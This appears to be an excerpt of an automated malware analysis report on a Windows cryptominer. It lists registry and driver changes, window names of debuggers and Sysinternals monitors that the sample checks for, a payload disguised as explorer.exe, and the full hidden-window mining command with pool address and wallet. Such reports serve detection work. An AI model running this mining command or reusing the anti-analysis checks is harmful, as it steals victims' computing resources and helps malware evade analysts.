Technical Information
- [<HKLM>\System\CurrentControlSet\Services\WinRing0_1_2_0] 'ImagePath' = '%TEMP%\WinRing0x64.sys'
- ClassName: 'OLLYDBG', WindowName: ''
- ClassName: 'GBDYLLO', WindowName: ''
- ClassName: 'pediy06', WindowName: ''
- ClassName: 'FilemonClass', WindowName: ''
- ClassName: '', WindowName: 'File Monitor - Sysinternals: www.sysinternals.com'
- ClassName: 'PROCMON_WINDOW_CLASS', WindowName: ''
- ClassName: '', WindowName: 'Process Monitor - Sysinternals: www.sysinternals.com'
- ClassName: 'RegmonClass', WindowName: ''
- ClassName: '', WindowName: 'Registry Monitor - Sysinternals: www.sysinternals.com'
- %TEMP%\explorer.exe
- 'gu##.##neroocean.stream':10004
- DNS ASK gu##.##neroocean.stream
- ClassName: '18467-41', WindowName: ''
- '%TEMP%\explorer.exe' -a rx/0 -o gulf.moneroocean.stream:10004 -u 46NSwM3R891HGkmfkPQLs7dVjpfzXy9QagQnkKv5y32K1YAqJPCgRxXRSq2TUp7bLAV2cTKoDD2h47NpLY6UZ3B69G4qC9w -p x -t 1 --donate-level=1
- '%TEMP%\explorer.exe' -a rx/0 -o gulf.moneroocean.stream:10004 -u 46NSwM3R891HGkmfkPQLs7dVjpfzXy9QagQnkKv5y32K1YAqJPCgRxXRSq2TUp7bLAV2cTKoDD2h47NpLY6UZ3B69G4qC9w -p x -t 1 --donate-level=1 (with hidden window)